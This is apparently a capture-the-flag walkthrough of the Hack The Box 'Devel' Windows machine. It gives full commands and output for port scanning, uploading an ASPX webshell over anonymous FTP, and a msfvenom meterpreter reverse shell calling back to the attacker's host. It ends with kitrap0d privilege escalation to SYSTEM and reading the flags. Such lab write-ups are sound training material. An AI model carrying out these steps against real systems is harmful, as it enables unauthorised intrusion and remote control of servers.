Machine IP | 10.10.10.5 |
System | Windows |
I start by modifying my /etc/hosts
file to avoid writing the IP everytime :
10.10.10.5 devel
Then I look for open ports and start an openvas scan:
nmap -p- devel -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 21:03 CEST
Nmap scan report for devel (10.10.10.5)
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 105.86 seconds
Now I can start nmap scripts on the open ports to gather more information:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 21:17 CEST
Nmap scan report for devel (10.10.10.5)
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
My OpenVAS scan is now finished, from nmap and OpenVas here is what I know:
Windows
Port | Service |
---|---|
21 | ftp |
80 | Microsoft IIS httpd 7.5 |
CVE | Service | Description | Severity |
---|---|---|---|
CVE-2015-1635 | IIS | MS15-034 HTTP.sys Remote Code Execution Vulnerability (remote check) | High |
none | FTP | Anonymous FTP Login Reporting | Medium |
none | IIS | Microsoft IIS Default Welcome Page Information Disclosure Vulnerability | Medium |
CVE-2010-3332 | IIS | Microsoft ASP.NET Information Disclosure Vulnerability (2418042) | Medium |
none | FTP | FTP Unencrypted Cleartext Login | Medium |
Now that I have a list of CVE I can see if they are included in metasploit and try them out.
I start Metasploit with msfconsole
and search for the first CVE.
msf5 > search 2015-1635
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
Even though there seems to be some kind of exploits, none can grant me enough information to retrieve the flags. Let's recap what I have at my disposal:
The anonymous ftp access lets me get and push files to the server public files. I should be able to push a webshell and access it from the server.
First I retrieve a standard aspx webshell from the ones included in my Parrot distribution.
cp /usr/share/webshells/aspx/cmdasp.aspx .
Then I push it to the server with my anonymous ftp access
ftp devel
Connected to devel.
220 Microsoft FTP Service
Name (devel:braincoke): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (12.3892 MB/s)
ftp>
Now I can access http://10.10.10.5/cmdasp.aspx and start sending command through the form.
If we try whomami
we get iis apppool\web
.
Using the shell from the form is quite impractical. To be more comfortable I will use a reverse shell generated from msfvenom
.
First I create the shell it will listen on port 4444
:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
Next I upload the shell to the server with my ftp
connection, I make sure to set the exchange type to binary
:
Connected to devel.
220 Microsoft FTP Service
Name (devel:braincoke): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put shell.exe
local: shell.exe remote: shell.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
73802 bytes sent in 0.07 secs (1.0353 MB/s)
Now I can start msfconsole
and a listener. To do so I use exploit/multi/handler
:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.2.15:4444
My listener is started, I can execute the payload by passing the command C:\inetpub\wwwroot\shell.exe
to the form.
Immediately, I can see that my listener is being activated:
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.5:49158) at 2019-09-29 17:31:48 +0200
meterpreter > ls
Listing: c:\windows\system32\inetsrv
====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 138752 fil 2009-07-14 02:11:35 +0200 AppHostNavigators.dll
100777/rwxrwxrwx 125440 fil 2009-07-14 02:10:51 +0200 InetMgr.exe
With my newly acquired meterpreter shell let's get some more information about the system:
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter >
I can try to get a root shell with getsystem
. In my case it didn't work.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
I will have to try other ways to get my privilege escalation. A good list can be found here.
After trying multiple things, and keeping in mind that I am targeting Windows 7, I decided to try windows/local/ms10_015_kitrap0d
.
To configure the exploit I first set my current shell in the background:
meterpreter > background
[*] Backgrounding session 1...
Then I select my exploit with use windows/local/ms10_015_kitrap0d
and configure it:
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4444
LPORT => 4444
Finally I can run the exploit
msf5 exploit(windows/local/ms10_015_kitrap0d) > run
Unfortunately it does not work. But sometimes an exploit needs to be run multiple times to work. After more tries I finally get my privilege escalation:
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Launching notepad to host the exploit...
[+] Process 2384 launched.
[*] Reflectively injecting the exploit DLL into 2384...
[*] Injecting exploit into 2384 ...
[*] Exploit injected. Injecting payload into 2384...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.4:4444 -> 10.10.10.5:49158) at 2019-09-29 18:33:36 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Now getting the flags is a piece of cake:
meterpreter > cat C:/Users/Administrator/Desktop/root.txt.txt
e621a0b5041708797c4fc4728bc72b4b
meterpreter > cat C:/Users/babis/Desktop/user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8